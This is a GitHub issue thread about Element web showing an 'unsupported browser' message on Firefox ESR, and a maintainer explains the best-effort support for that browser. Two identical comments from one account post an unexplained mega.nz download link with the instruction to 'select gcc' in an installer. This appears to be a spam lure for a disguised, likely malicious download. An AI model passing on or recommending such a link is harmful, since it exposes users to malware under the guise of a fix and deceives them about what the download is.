### ISSUE TITLE
"Element does not support this browser" message on Firefox

### ISSUE THREAD

**Issue by DonTomato** [element-hq/element-web#27963]
### Steps to reproduce

Open register link https://app.element.io/#/register in Firefox on Debian 12

### Outcome

![image](https://github.com/user-attachments/assets/5beea134-fe21-48ad-a9c9-de6c3d27dd0e)

### Operating system

Debian 12

### Browser information

Firefox 115.14.0esr (64-bit) on Linux

### Will you send logs?

Yes

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by vorboyvo** [comment]
Funnily enough, I'm also getting this issue - but on the Element (electron) app. On NixOS 24.11.20240824.d0e1602

**Comment by florianduros** [comment]
@vorboyvo more informations about the desktop issue https://github.com/element-hq/element-desktop/issues/1828

**Comment by florianduros** [comment]
According to https://github.com/element-hq/element-web#supported-environments Firefox ESR is in our best effort strategy. Firefox ESR lacks some non critical features but is usable.

If you click on "Continue anyway", you should be able to use Element.
